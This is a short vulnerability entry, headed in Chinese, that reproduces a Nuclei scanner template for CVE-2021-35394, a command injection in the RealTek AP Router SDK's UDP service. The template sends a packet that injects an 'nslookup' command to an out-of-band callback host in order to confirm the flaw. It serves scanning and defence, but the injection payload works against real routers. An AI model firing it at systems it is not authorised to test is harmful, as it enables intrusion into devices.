漏洞描述
The SDK exposes a UDP server that allows remote execution of arbitray commands.
CVE-2021-35394: RealTek AP Router SDK - Arbitrary Command Injection
PoC代码[已公开]
id: CVE-2021-35394
info:
name: RealTek AP Router SDK - Arbitrary Command Injection
author: king-alexander
severity: critical
remediation: Apply the latest security patches or updates provided by RealTek.
description: The SDK exposes a UDP server that allows remote execution of arbitray commands.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-35394
- https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
classification:
epss-score: 0.94335
epss-percentile: 0.99947
tags: cve,cve2021,realtek,rce,kev,vkev,vuln
javascript:
- pre-condition: |
isUDPPortOpen(Host,Port);
code: |
let packet = bytes.NewBuffer();
let message = `orf;nslookup ${OAST}`
let data = message;
packet.WriteString(data)
let c = require("nuclei/net");
let conn = c.Open('udp', `${Host}:${Port}`);
conn.SendHex(packet.Hex());
args:
Host: "{{Host}}"
Port: 9034
OAST: "{{interactsh-url}}"
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 4b0a004830460221009f8a587f08e74b8350520e84a1a58820adebbd06c2c41266d2c96e569500685d022100873691bb2b958b810c28c12c36f028587ebfc07e48be5bb83bf1a2ec7a1cced7:922c64590222798bb761d5b6d8e72950